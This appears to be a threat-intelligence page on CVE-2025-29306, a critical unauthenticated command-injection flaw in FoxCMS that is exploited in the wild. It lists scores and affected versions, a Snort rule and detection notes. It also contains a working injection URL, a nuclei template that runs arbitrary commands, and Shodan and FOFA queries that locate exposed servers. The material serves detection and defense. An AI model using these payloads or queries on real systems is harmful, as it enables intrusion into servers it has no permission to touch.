CVE-2025-29306
published 2025-03-27

CVE-2025-29306: An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.

Priority P1 · 84 · critical 9.8 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS
43.66%
98.6th percentile

Affected

1 range

Vendor    Product   Version range   Fixed in
foxcms    foxcms    < 1.2           1.2

Detection & IOCs (extracted from sources)

path: /images/index.html
url: /images/index.html?id=${@print_r(@system("id"))}
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/images/index.html|3f|id|3d 24|"; fast_pattern; content:"|40|print_r"; distance:0; content:"|40|system"; within:20; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-29306.yaml; reference:cve,2025-29306; classtype:attempted-admin; sid:2062497; rev:1; metadata:affected_product FoxCMS, attack_target Web_Server, tls_state plaintext, created_at 2025_05_21, cve CVE_2025_29306, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_05_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
nuclei template (YAML)
id: CVE-2025-29306
http:
- method: GET
  path:
  - "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D"
  matchers:
  - type: regex
    part: body
    regex:
    - "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)"
    - "root:.*:0:0:"
  - type: word
    part: body
    words:
    - "foxcms"
  • The attack targets the `id` GET parameter of `/images/index.html` with a PHP template injection payload using `@print_r(@system(...))` syntax. Look for URL-encoded `%24%7B%40print_r` or `%40system` in HTTP GET requests to this path.
  • FOFA and Shodan fingerprinting queries can identify exposed FoxCMS instances: search for `body="foxcms-logo"` (FOFA) or `html:"foxcms-logo"` (Shodan).
  • Successful exploitation produces OS command output in the HTTP response body. Detect responses containing regex patterns `uid=[0-9]+\(\w+\) gid=[0-9]+\(\w+\)` or `root:.*:0:0:` alongside the word `foxcms`.
  • The exploit is unauthenticated (no login required). Any GET request to `/images/index.html` with a `$` character in the `id` parameter should be treated as suspicious.
  • The Snort/ET rule uses byte-level matching: HTTP URI must contain `/images/index.html?id=$` (hex: `/images/index.html|3f|id|3d 24|`) followed by `@print_r` (hex: `|40|print_r`) and `@system` (hex: `|40|system`) within 20 bytes.
  • The exploit script parses command output from a specific XPath location in the HTML response (`/html/body/header/div[1]/div[2]/div[1]/ul`), meaning the injection point reflects output inside the page's navigation/header structure, which is useful for response-based detection tuning.
  • The Snort rule (sid:2062497) is marked `tls_state plaintext`, meaning it will NOT fire on HTTPS/TLS-encrypted traffic. Ensure SSL inspection is in place for full coverage.
  • The vulnerability is in the `case display page` component (`index.html`), not a standard PHP endpoint. The injection is processed server-side as a PHP template expression, suggesting a template engine (not direct PHP eval) is involved.

CVSS provenance

nvd        v3.1   9.8 CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck         9.8 CRITICAL